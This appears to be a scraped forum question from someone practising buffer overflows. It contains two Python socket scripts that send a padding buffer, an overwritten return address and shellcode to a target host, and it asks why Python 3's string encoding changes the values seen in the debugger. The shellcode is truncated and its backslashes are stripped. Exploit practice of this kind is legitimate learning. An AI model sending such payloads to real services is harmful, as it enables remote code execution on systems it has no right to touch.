I'm practicing some buffer-overflow techniques and
I came across an odd issue with sending socked data.
I have this two almost identical codes, except the fact
that in Python3 code, I changed the sock.send to encode the
string (in Python2 you don't need that)
Python2 code:
import socket,sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((sys.argv[1], 10000))
buffer = "A"*268
buffer += "x70xfbx22x00"
#PAYLOAD:
buffer += ("xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52"
"x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48"
...
"x72x6fx6ax00x59x41x89xdaxffxd5")
sock.send (buffer)
sock.close
Python 3 code:
import socket,sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((sys.argv[1], 10000))
buffer = "A"*268
buffer += "x70xfbx22x00"
#PAYLOAD:
buffer += ("xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52"
"x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48"
...
"x72x6fx6ax00x59x41x89xdaxffxd5")
sock.send (buffer.encode())
sock.close
I send the buffer and then check the EIP/SEP values with immunity debugger
and I see that i'm getting a different values between Python2 code and Python3
code. How is that possible??
The buffer is the same in both of them so the EIP/SEP in the debugger should be the same.
In other words, from the server point of view(which gets the socket-data)
looks like it gets a different data structure or something like that.
Any ideas?
Thanks.
See Question&Answers more detail:
os 与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
